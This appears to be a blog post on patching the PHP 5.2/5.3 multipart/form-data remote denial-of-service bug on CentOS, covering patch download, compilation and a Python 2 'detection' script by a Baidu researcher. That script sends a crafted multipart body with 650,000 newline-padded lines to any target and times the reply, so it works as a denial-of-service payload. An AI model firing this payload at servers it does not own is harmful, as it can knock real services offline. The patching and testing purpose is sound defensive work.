Today I saw the PHP multipart/form-data remote DoS vulnerability on WooYun and immediately contacted my colleagues to patch our online servers. First, here is a tutorial for compiling and installing nginx + php-fpm + mysql on CentOS. If your installation is based on mine, you can follow the steps below; if not, take a look anyway.
System: CentOS 5.x (64-bit)
Required software: php-5.2-multipart-form-data.patch
1. View your PHP version
php -v
PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies
If the version is higher than 5.3, you can upgrade PHP directly.
2. Download the patch file
wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
Or
wget /php_patch/php-5.2-multipart-form-data.patch
3. Install the patch
5.2:
cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
cd php-5.2.17
patch -p1 < php-5.2-multipart-form-data.patch
5.3:
wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
patch -p1 < php-5.3-multipart-form-data.patch
Remove lines 42 to 45:
if [ "$php_version" == "$old_php_version" ]; then
    echo "Error: The upgrade PHP Version is the same as the old version!!"
    exit 1
fi
4. Re-compile PHP
./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log \
--with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc \
--with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl \
--enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext \
--enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv \
--with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear
PS: You had better check your own PHP compile parameters first: php -i | grep configure
make && make install
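Steps 1 to 3 above, combined into one guarded routine: choose the patch from the `php -v` output, then apply it only when a dry run shows every hunk fits. This is an added example, not part of the original post; the function names pick_patch and apply_checked are hypothetical, and GNU patch is assumed.

```shell
#!/bin/sh
# Added example, not from the original post. pick_patch and apply_checked are
# hypothetical helper names; GNU patch is assumed.

# Map the first line of `php -v` output to the action the post describes:
# a patch file name for 5.2 / 5.3, "upgrade" for newer branches, else "unknown".
pick_patch() {
    ver=$(printf '%s\n' "$1" |
          sed -n '1s/^PHP \([0-9][0-9]*\.[0-9][0-9]*\)\..*/\1/p')
    case "$ver" in
        5.2) echo "php-5.2-multipart-form-data.patch" ;;
        5.3) echo "php-5.3-multipart-form-data.patch" ;;
        5.[4-9]|5.[1-9][0-9]|[6-9].*|[1-9][0-9].*) echo "upgrade" ;;
        *)   echo "unknown" ;;
    esac
}

# Apply patch file $2 inside source tree $1 only if every hunk applies.
# Returns 0 on success, 1 if the dry run fails, 2 on bad arguments.
apply_checked() {
    src=$1
    patchfile=$2
    [ -d "$src" ] && [ -f "$patchfile" ] || {
        echo "missing source tree or patch file" >&2
        return 2
    }
    # Make the patch path absolute, since we cd into the tree below.
    case "$patchfile" in
        /*) ;;
        *)  patchfile=$PWD/$patchfile ;;
    esac
    # -N: never prompt about reversed / previously applied patches.
    if ! (cd "$src" && patch -N -p1 --dry-run < "$patchfile" >/dev/null 2>&1); then
        echo "patch does not apply cleanly (or is already applied);" \
             "$src left untouched" >&2
        return 1
    fi
    (cd "$src" && patch -N -p1 < "$patchfile")
}

# Usage with the paths from the post:
#   p=$(pick_patch "$(php -v)")
#   [ -f "$p" ] && apply_checked ~/install/php-5.2.17 "$p"
```

A failed dry run means the source tree differs from what the patch expects, so stop and compare versions before recompiling.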
All right, the vulnerability is now patched. So how do we detect it? See the following script:
cat dd.py
'''
Author: Shusheng Liu, The Department of Security Cloud, Baidu
Email: liusscs@163.com
'''
# Python 2 script (uses urllib2 and optparse).
import sys
import urllib, urllib2
import datetime
from optparse import OptionParser

def http_proxy(proxy_url):
    # Optionally route requests through an HTTP proxy (useful for debugging).
    proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy

def check_php_multipartform_dos(url, post_body, headers):
    req = urllib2.Request(url)
    for key in headers.keys():
        req.add_header(key, headers[key])
    # Time the whole request; a patched server answers quickly.
    starttime = datetime.datetime.now()
    fd = urllib2.urlopen(req, post_body)
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime = (endtime - starttime).seconds
    # Default result, so the return below never uses an unassigned name.
    result = url + ' does not appear vulnerable'
    if usetime > 5:
        result = url + ' is vulnerable'
    elif usetime > 3:
        result = 'need to check normal respond time'
    return [result, usetime]
#end

def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
    (options, args) = parser.parse_args()
    if options.target:
        target = options.target
    else:
        return
    num = 650000
    headers = {'Content-Type': 'multipart/form-data; boundary=----webkitformboundaryx3b7rdmpcqlzmje1',
               'Accept-Encoding': 'gzip, deflate',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------webkitformboundaryx3b7rdmpcqlzmje1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload = ""
    for i in range(0, num):
        payload = payload + "a\n"
    body = body + payload
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------webkitformboundaryx3b7rdmpcqlzmje1--"
    print "Starting ..."
    respond = check_php_multipartform_dos(target, body, headers)
    print "Result:"
    print respond[0]
    print "Respond Time: " + str(respond[1]) + " seconds"

if __name__ == "__main__":
    main()
This script is for testing only; if you do bad things with it, that has nothing to do with this site.